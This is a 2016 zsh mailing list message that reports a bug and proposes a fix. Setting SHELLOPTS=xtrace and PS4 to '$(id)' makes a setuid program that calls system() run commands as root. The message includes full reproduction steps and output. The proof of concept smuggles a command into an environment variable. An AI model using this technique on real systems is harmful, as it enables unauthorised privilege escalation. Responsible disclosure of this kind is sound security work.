Zsh Mailing List Archive
Messages sorted by: Reverse Date, Date, Thread, Author

BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in setuid binaries using system



Hello everyone!

I just learned that bash fixed a vulnerability that also affects zsh. It
allowed to run arbitrary programs by crafting SHELLOPTS and PS4 variables
against setuid binaries using system/popen.

Steps to reproduce:
% gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
% sudo chown root:root test
% sudo chmod 4755 test
% env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root) gid=... groups=.../bin/date
Tue Sep 27 08:49:16 CEST 2016
% zsh --version

zsh 5.2 (x86_64-pc-linux-gnu)
%

The solution that bash folks implemented is to drop PS4 from env when the
shell is ran as root.

Best,
mlen


Messages sorted by: Reverse Date, Date, Thread, Author